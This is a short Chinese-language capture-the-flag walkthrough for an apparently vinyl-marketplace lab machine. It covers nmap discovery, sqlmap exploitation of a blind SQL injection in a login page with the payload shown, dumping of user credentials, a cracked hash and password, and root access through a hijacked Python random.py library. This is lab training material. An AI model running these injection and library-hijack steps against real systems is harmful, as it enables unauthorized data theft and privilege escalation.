主机发现
使用 nmap 进行主机发现[[THM_Nmap Live Host Discovery(活动主机发现)]]
sudo nmap 192.168.10.1/24 -PA -sn -oN portscan/discovery.nmap
192.168.10.10
端口扫描
web 侦查
利用登录页面的 sql 注入
sqlmap
sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login="
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 7762 FROM (SELECT(SLEEP(5)))rBJA) AND 'mJfQ'='mJfQ&password=admin&login=
---
查看所有数据库
sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --dbs
查看数据库的表信息
sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --tables -D vinyl_marketplace
查看某一个表的列信息
sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --columns -D vinyl_marketplace -T users
查看对应列的信息
sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" -C username -D vinyl_marketplace -T users --dump
sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" -C password -D vinyl_marketplace -T users --dump
获得立足点
成功登录lana 用户 但是不能 ssh
9432522ed1a8fca612b11c3980a031f6
md5
ssh [email protected]
shopadmin:addicted2vinyl
权限提升_python 库劫持
ls -al /usr/bin/python3
/usr/lib/python3.10/random. py
实际是使用的 python3.10 将 vinylizer 代码下载到本地之后, 寻找利用点, 但是代码逻辑没有发现能够利用的点 发现使用了 random. py 这个第三方库, 尝试第三方库接吃吃 呗 使用 gpt 随便生成一个 random. py 文件
# random.py
import os
# 恶意代码
print("Executing malicious code...")
# 例如,在Linux环境下创建一个文件来证明执行成功
os.system('touch /tmp/malicious_code_executed')
然后复制到靶机上 成功替换 执行成功 获得一个 suid 的 bash root
学习wp
sqlmap
--batch 全自动,不用回答Y